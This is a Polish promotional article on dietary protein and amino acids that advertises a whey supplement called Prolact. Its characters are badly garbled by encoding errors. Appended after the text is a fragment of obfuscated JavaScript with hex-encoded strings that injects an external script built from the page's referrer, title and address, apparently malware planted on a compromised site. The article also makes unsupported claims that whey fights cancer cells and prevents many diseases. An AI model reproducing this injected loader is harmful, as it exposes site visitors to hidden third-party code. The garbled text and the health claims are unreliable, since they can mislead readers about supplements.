BiaAi??ka dla zdrowia i sprawnoAi??ci

BiaAi??ko to podstawowa substancja budulcowa dla hormonA?w, enzymA?w, miAi??Ai??ni ,koAi??ci , paznokci, zAi??bA?w i wAi??osA?w czAi??owieka. Z fizjologicznego punktu biaAi??ko jest czAi??owiekowi niezbAi??dne do zachowania zdrowia, sprawnoAi??ci i prawidAi??owego funkcjonowania. Dzienne zapotrzebowanie na biaAi??ko u kobiety wynosi od 0,8 ai??i?? 1,0 g na kaA?dy kilogram masy ciaAi??a. U kobiet aktywnych fizycznie i stosujAi??cych diety odchudzajAi??ce wzrasta ono i wynosi od 1,5 ai??i?? 2,0 g u sportowcA?w wynosi od 2,0 ai??i?? 4,0 g na kaA?dy kilogram masy ciaAi??a.

CiaAi??o czAi??owiekaAi?? a szczegA?lnie miAi??Ai??nie sAi?? zbudowanie gAi??A?wnie z aminokwasA?w i wody. Utrzymywanie ich w dobrej kondycji wymaga staAi??ego dostarczania biaAi??ka, ktA?re rozkAi??adane jest w A?oAi??Ai??dku przez kwas solny i enzym trawiennyAi?? – proteazAi?? do aminokwasA?w. Organizm czAi??owieka potrafi samodzielnie wytworzyAi?? 12-13 z 21 aminokwasA?w. Warunkiem jest codzienne spoA?ywanie biaAi??ka peAi??nowartoAi??ciowego ,ktA?re zawiera: tryptofan, fenyloalaninAi??, leucynAi??, izoleucynAi??, walinAi??, metioninAi??, treoninAi?? i lizynAi?? czyli AMINOKWASY NIEZBA?DNE. Aminokwasy te majAi?? istotny wpAi??yw na naszAi?? sprawnoAi??Ai?? fizycznAi?? i umysAi??owAi?? a takA?e biorAi?? udziaAi?? w reakcjach hormonalnych. Brak lub choAi??by niedobA?r jednego z nich niekorzystnie wpAi??ywa na tworzenie pozostaAi??ych aminokwasA?w. Tylko spoA?ywanieAi?? biaAi??ko peAi??nowartoAi??ciowe jest czAi??owiekowi niezbAi??dne do zachowania zdrowia iAi?? A?ycia. Niestety, z wiekiem lub w skutek chorA?b maleje iloAi??Ai?? kwasu solnego i proteazy w organizmie , dlatego wiele osA?b ma kAi??opoty trawienne przy codziennym spoA?ywaniu biaAi??ka a odpowiedzialne sAi?? za to polipeptydy (Ai??aAi??cuchy niekompletnych biaAi??ek), ktA?re czAi??sto wywoAi??ujAi?? reakcje alergiczne i inne dolegliwoAi??ci trawienne . W takich sytuacjach uzasadnione jest stosowanie suplementA?w diety w celu codziennego uzupeAi??nienia niedoboru biaAi??ka w diecie. Na rynku naturalnych suplementA?w diety wspomagajAi??cych funkcjonowanie organizmu czAi??owieka sAi?? dostAi??pne preparaty biaAi??kowe zawierajAi??ce aminokwasy wolne lub zAi??oA?one w postaci proszku, tabletek, kapsuAi??ek a takA?e wAi?? formie pAi??ynnej.

Badania naukowe na caAi??ym Ai??wiecie potwierdzajAi?? , A?e dodatkowe przyjmowanie biaAi??ka i aminokwasA?w w formie suplementacji wpAi??ywa korzystnie na prawidAi??owe funkcjonowanie organizmu czAi??owiekaAi?? oraz zapobiega powstawaniu wielu chorA?b.Ai?? BiaAi??ko sprzyja odchudzaniu, leczeniu nadwagi i otyAi??oAi??ci oraz innych chorA?b. Obecnie najlepiej przyswajalnymi przez organizm sAi?? aminokwasy, uzyskiwane w zaawansowanych procesach technologicznych z biaAi??ka serwatki. BiaAi??ko serwatki zawiera Immunoglobuliny i Laktoferyny ai??i?? substancje, ktA?re w skuteczny sposA?b wspomagajAi?? ukAi??ad odpornoAi??ciowy czAi??owieka w walce z rA?A?nego rodzaju wirusami iAi?? bakteriami oraz komA?rkami nowotworowymi.

Prolact to koncentrat z biaAi??ka serwatki. KaA?da porcja zawiera aA? 25 g biaAi??ka, a przy tym minimalne iloAi??ciAi?? tAi??uszczA?w i laktozy oraz najbardziej skondensowane polipeptydy z biaAi??ek serwatkowych (prawie 95 % czystej substancji). Zawiera peAi??enAi?? zestaw 21 aminokwasA?w, dobrze rozpuszcza siAi?? we wszelkich pAi??ynach i szybko siAi?? wchAi??ania. DziAi??ki temu unikalnemu zestawowi aminokwasA?w, wysokiej zawartoAi??ci BCAA oraz GLUTAMINY moA?na osiAi??gnAi??Ai?? efekt maksymalnej regeneracji i odbudowy hormonA?w, enzymA?w oraz komA?rek miAi??Ai??niowych.

Prolact to smaczny, lekkostrawny czyli idealny napA?j biaAi??kowyAi?? dla kaA?dejAi?? kobiety dbajAi??cej o swoje zdrowie, sprawnoAi??Ai?? iAi?? aktywnoAi??Ai??Ai?? oraz sportowcA?w wszystkich dyscyplin sportowych, poniewaA? dobrze sprawdza siAi??Ai?? w peAi??nej odnowie biologicznej organizmu oraz rekonwalescencji po chorobie bo zapewnia staAi??Ai?? i odpowiedniAi?? iloAi??Ai?? aminokwasA?w. PoniewaA? preparat ten posiada odpowiedniAi?? indeks glikemiczny, moA?e byAi?? rA?wnieA? z powodzeniem uA?ywany przez diabetykA?w.. uot;,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}